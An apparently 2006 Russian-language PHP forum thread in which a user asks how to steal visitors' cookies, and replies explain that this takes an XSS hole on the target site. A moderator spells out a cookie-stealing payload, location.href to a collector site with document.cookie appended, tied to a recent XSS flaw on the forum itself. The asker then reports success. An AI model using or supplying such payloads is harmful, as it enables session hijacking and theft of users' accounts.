Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель MySQL 5. Авторы: Кузнецов М.В., Симдянов И.В. MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: Как украсть чужие cookie?
 
 автор: deadlol   (20.09.2006 в 01:57)   письмо автору
 
 

задача заключаеться в следующем : при захождении пользователя на мою страницу я вытаскиваю все его кукиз к себе на сервер, возможно это сделать??? если да то как????

   
 
 автор: Oligarx   (20.09.2006 в 02:32)   письмо автору
 
   для: deadlol   (20.09.2006 в 01:57)
 

)))) все невозможно ... одни то не вытащите ... короче надо чтобы хост был одинаковым т мем куки которого вы хотите стащить (обчно это делается прямо на сайте (куки кторого вы хотите стащить делается атака XXS помойму (в общем чтобы на странице этого сайта был ява скрипт который бы перенаправлял всех на ваш скрипт и там уже забирал куки и например записывал их куданибуть)))

извините за плохое изложение )) (спать хочу)

если что непонятно, завтра объясню

   
 
 автор: cheops   (20.09.2006 в 12:31)   письмо автору
 
   для: deadlol   (20.09.2006 в 01:57)
 

При заходе на ваш сайт вы можете получить только cookie, установленные вашим сайтом, cookie установленные другими сайтами можно извлечь только с других сайтов, обычно это и является целью XSS-атаки.

   
 
 автор: deadlol   (20.09.2006 в 13:03)   письмо автору
 
   для: cheops   (20.09.2006 в 12:31)
 

как сложно это реализовать ????
есть какая нить инфа на тему????

заранее благодарен!!!!!

   
 
 автор: cheops   (20.09.2006 в 13:14)   письмо автору
 
   для: deadlol   (20.09.2006 в 13:03)
 

Такие примеры рассматриваются в нашей книге "Головоломки на PHP для хакера". Однако не расчитывайте, что это просто, сайт должен иметь дыру, чтобы иметь возможность загрузки эксплоита, кроме того, владельцы сайта почти наверняка обнаружат эксполит, да и для сбора cookie потребуется хост куда вы будете перебрасывать посетителей, по которому вас будет не сложно вычислить.

   
 
 автор: DeadLOL   (20.09.2006 в 13:27)   письмо автору
 
   для: cheops   (20.09.2006 в 13:14)
 

НИКАКИХ намерений по использованию чужой иформации в своих целях я не приследую.
Просто хотел ознакомиться с данной технологией.

т.е другими словами мне нужно сделать редирект пользователя на свою страницу????

такую ситуацию можно использовать в своих целях:

на сервере ХХХ используеться для проверки подлинности узера куки метод , допустим что срок годности печений не ограничен (конечно это глупость но все же). На этом сервере есть большое кол-во пользователей, зарегистрированные пользователи (т.е те у каторых есть кукиз) могут просматривать унфу друг друга. А я соответственно в своей инфе указываю свою домашнюю страницу, которая и будет .........

Ситуация выдуманна любое совпадение случайно.

   
 
 автор: cheops   (20.09.2006 в 13:36)   письмо автору
 
   для: DeadLOL   (20.09.2006 в 13:27)
 

Под эти все определения подходит этот форум, вот недавно была тема http://www.softtime.ru/forum/read.php?id_forum=2&id_theme=23939 - была возможность XSS-атаки при ответе на сообщение атакующего, если вместо alert() использовать location.href='http://www.mysite.ru/index.php?cookie=' + document.cookie, то на своём сайте www.mysite.ru в скрипте index.php можно было бы получить cookie через параметр $_GET['cookie'] и помещать их базу данных или файл.

   
 
 автор: DeadLOL   (20.09.2006 в 13:49)   письмо автору
 
   для: cheops   (20.09.2006 в 13:36)
 

Ой а у вас куки на 4 дня 2шт плюс не шифрованные......
приведите пример index.php on www.myserv.ru

   
 
 автор: DeadLOL   (20.09.2006 в 15:05)   письмо автору
 
   для: cheops   (20.09.2006 в 13:14)
 

ок спс я сделал
не надо высылать исходник

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования